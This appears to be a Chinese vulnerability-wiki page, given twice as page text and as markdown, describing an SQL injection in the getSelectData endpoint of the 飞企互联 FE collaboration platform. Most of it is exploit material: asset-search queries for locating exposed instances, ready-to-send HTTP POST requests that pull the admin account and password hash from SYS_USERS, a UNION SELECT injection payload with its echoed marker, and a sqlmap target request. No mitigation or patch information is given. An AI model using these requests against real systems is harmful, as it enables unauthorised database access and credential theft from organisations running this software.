fofamini-wiki

登录白背景

源码

飞企互联FE业务协作平台getSelectData存在SQL注入漏洞

一、漏洞简介

FE 办公协作平台是实现应用开发、运行、管理、维护的信息管理平台。飞企互联FE业务协作平台getSelectData存在SQL注入漏洞，攻击者可通过该漏洞获取数据库敏感信息。

二、影响版本

飞企互联FE业务协作平台

三、资产测绘

hunterapp.name=="飞企互联 FE 6.0+"||app.name=="飞企互联 FE"
登录页面

四、漏洞复现

通过如下poc可查询管理员账号及加密密码

POST /oaerp/ui/common/publicData.js%70 HTTP/1.1
Host: {hostname}
User-Agent: Mozilla/5.0
Content-Length: 49
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded
X-Forwarded-For: 127.0.0.1
X-Originating-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Remote-IP: 127.0.0.1

type=getSelectData&table=SYS_USERS&filter=SU01%3D%27admin%27

POST /oaerp/ui/common/publicData.js%70 HTTP/1.1
Host: {hostname}
User-Agent: Mozilla/5.0
Content-Length: 49
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded
X-Forwarded-For: 127.0.0.1
X-Originating-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Remote-IP: 127.0.0.1

type=getSelectData&table=SYS_USERS&filter=SU01='admin'+UNION+ALL+SELECT+NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CCHAR%28113%29%2BCHAR%28120%29%2BCHAR%28120%29%2BCHAR%28118%29%2BCHAR%28113%29%2BCHAR%2874%29%2BCHAR%28108%29%2BCHAR%2879%29%2BCHAR%2865%29%2BCHAR%2889%29%2BCHAR%2867%29%2BCHAR%28120%29%2BCHAR%2868%29%2BCHAR%2899%29%2BCHAR%2876%29%2BCHAR%28111%29%2BCHAR%28113%29%2BCHAR%2885%29%2BCHAR%28104%29%2BCHAR%28117%29%2BCHAR%28121%29%2BCHAR%28118%29%2BCHAR%28101%29%2BCHAR%2873%29%2BCHAR%2871%29%2BCHAR%28100%29%2BCHAR%2875%29%2BCHAR%28115%29%2BCHAR%2870%29%2BCHAR%28120%29%2BCHAR%28101%29%2BCHAR%2878%29%2BCHAR%2875%29%2BCHAR%28112%29%2BCHAR%2881%29%2BCHAR%28105%29%2BCHAR%2890%29%2BCHAR%28107%29%2BCHAR%28118%29%2BCHAR%2897%29%2BCHAR%28117%29%2BCHAR%2869%29%2BCHAR%28105%29%2BCHAR%28115%29%2BCHAR%2872%29%2BCHAR%28113%29%2BCHAR%28120%29%2BCHAR%28107%29%2BCHAR%28106%29%2BCHAR%28113%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--+ayHW

回显

qxxvqJlOAYCxDcLoqUhuyveIGdKsFxeNKpQiZkvauEisHqxkjq

sqlmap

POST /oaerp/ui/common/publicData.js%70 HTTP/1.1
Host: {hostname}
User-Agent: Mozilla/5.0
Content-Length: 49
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded
X-Forwarded-For: 127.0.0.1
X-Originating-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Remote-IP: 127.0.0.1

type=getSelectData&table=SYS_USERS&filter=SU01%3D%27admin%27

原文: https://www.yuque.com/xiaokp7/ocvun2/zq4t3hh672ruqtx2

# 飞企互联FE业务协作平台getSelectData存在SQL注入漏洞

# 一、漏洞简介
FE 办公协作平台是实现应用开发、运行、管理、维护的信息管理平台。飞企互联FE业务协作平台getSelectData存在SQL注入漏洞，攻击者可通过该漏洞获取数据库敏感信息。

# 二、影响版本

- 飞企互联FE业务协作平台

# 三、资产测绘

- hunter`app.name=="飞企互联 FE 6.0+"`||`app.name=="飞企互联 FE"`
- 登录页面

![image.png](./img/93A8gF9idb4Z5so-/1699089816407-bde9e92a-e1f9-4241-bfde-6f8d413f338e-023530.png)

# 四、漏洞复现
通过如下poc可查询管理员账号及加密密码
```
POST /oaerp/ui/common/publicData.js%70 HTTP/1.1
Host: {hostname}
User-Agent: Mozilla/5.0
Content-Length: 49
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded
X-Forwarded-For: 127.0.0.1
X-Originating-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Remote-IP: 127.0.0.1

type=getSelectData&table=SYS_USERS&filter=SU01%3D%27admin%27
```
![image.png](./img/93A8gF9idb4Z5so-/1702459162418-1d3221a0-8fa2-4241-b653-703d053c589f-901920.png)
```
POST /oaerp/ui/common/publicData.js%70 HTTP/1.1
Host: {hostname}
User-Agent: Mozilla/5.0
Content-Length: 49
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded
X-Forwarded-For: 127.0.0.1
X-Originating-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Remote-IP: 127.0.0.1

type=getSelectData&table=SYS_USERS&filter=SU01='admin'+UNION+ALL+SELECT+NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CCHAR%28113%29%2BCHAR%28120%29%2BCHAR%28120%29%2BCHAR%28118%29%2BCHAR%28113%29%2BCHAR%2874%29%2BCHAR%28108%29%2BCHAR%2879%29%2BCHAR%2865%29%2BCHAR%2889%29%2BCHAR%2867%29%2BCHAR%28120%29%2BCHAR%2868%29%2BCHAR%2899%29%2BCHAR%2876%29%2BCHAR%28111%29%2BCHAR%28113%29%2BCHAR%2885%29%2BCHAR%28104%29%2BCHAR%28117%29%2BCHAR%28121%29%2BCHAR%28118%29%2BCHAR%28101%29%2BCHAR%2873%29%2BCHAR%2871%29%2BCHAR%28100%29%2BCHAR%2875%29%2BCHAR%28115%29%2BCHAR%2870%29%2BCHAR%28120%29%2BCHAR%28101%29%2BCHAR%2878%29%2BCHAR%2875%29%2BCHAR%28112%29%2BCHAR%2881%29%2BCHAR%28105%29%2BCHAR%2890%29%2BCHAR%28107%29%2BCHAR%28118%29%2BCHAR%2897%29%2BCHAR%28117%29%2BCHAR%2869%29%2BCHAR%28105%29%2BCHAR%28115%29%2BCHAR%2872%29%2BCHAR%28113%29%2BCHAR%28120%29%2BCHAR%28107%29%2BCHAR%28106%29%2BCHAR%28113%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--+ayHW
```
![image.png](./img/93A8gF9idb4Z5so-/1702459264529-6272ade8-de14-499d-93c7-0387482cf75c-446867.png)
回显
```
qxxvqJlOAYCxDcLoqUhuyveIGdKsFxeNKpQiZkvauEisHqxkjq
```
sqlmap
```
POST /oaerp/ui/common/publicData.js%70 HTTP/1.1
Host: {hostname}
User-Agent: Mozilla/5.0
Content-Length: 49
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded
X-Forwarded-For: 127.0.0.1
X-Originating-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Remote-IP: 127.0.0.1

type=getSelectData&table=SYS_USERS&filter=SU01%3D%27admin%27
```
![image.png](./img/93A8gF9idb4Z5so-/1702459303087-afa03fa9-8f28-4de5-8d3e-479ec78294cf-187277.png)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/zq4t3hh672ruqtx2>